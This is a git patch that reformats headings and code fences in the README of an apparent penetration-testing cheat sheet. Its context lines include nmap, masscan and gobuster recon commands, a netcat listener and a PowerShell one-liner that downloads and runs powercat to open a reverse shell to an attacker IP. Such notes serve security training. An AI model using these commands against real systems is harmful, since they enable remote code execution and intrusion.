From 1cdc1241dc71382e50051219b1dc1c591493d6e1 Mon Sep 17 00:00:00 2001
From: Phil
Date: Fri, 24 Dec 2021 13:41:29 +0000
Subject: [PATCH] Formatting
---
 README.md | 25 ++++++++++++++++++-------
 1 file changed, 18 insertions(+), 7 deletions(-)
diff --git a/README.md b/README.md
index 5c78b5c..f715673 100644
--- a/README.md
+++ b/README.md
@@ -30,14 +30,14 @@
-##### Nmap
+#### Nmap
 ```
 nmap -sV -sC -oA nmap/basic IP
 nmap [Scan Type] [Options] {target specification}
 ```
-
+```
 * HOST DISCOVERY:
 - -sL: List Scan - simply list targets to scan
 - -sn/-sP: Ping Scan - disable port scan
@@ -59,20 +59,25 @@ nmap [Scan Type] [Options] {target specification}
 -v: Increase verbosity level (use -vv or more for greater effect)
 * MISC:
 -6: Enable IPv6 scanning
 -A: Enable OS detection, version detection, script scanning, and traceroute
+```
-##### Masscan
+
+#### Masscan
 ```bash
 masscan IP -p 1-65535 --rate 100 -oX masscan.xml
 ```
-##### Netdiscover
+
+
+#### Netdiscover
 ````
 netdiscover -i
 ```
-##### DirBuster / GoBuster
+
+#### DirBuster / GoBuster
 ```bash
 ./gobuster -u http://buffered.io/ -w /secondary/wordlists/more-lists/dirb/ -t 10
@@ -91,7 +96,7 @@ netdiscover -i
 ### Attacking - Reverse Shells
-* PHP Reverse Shell
+#### PHP Reverse Shell
 ```
 ```
+#### Built-in Tools
+
 | Program | Command |
 |----------|---------|
 | Netcat Listen | ncat -vlnp 4444 |
@@ -300,7 +307,9 @@ function printit ($string) {
 | Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html |
 | Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd |
-### Spawning a Shell
+
+
+#### Spawning a Shell
 To check if the shell is a tty shell, just enter tty command like the following.
@@ -339,6 +348,8 @@ fg
 export TERM=xterm
 ```
+
+
 ## Stage 3 - Post Exploitation
 ### Lets Have a Look Around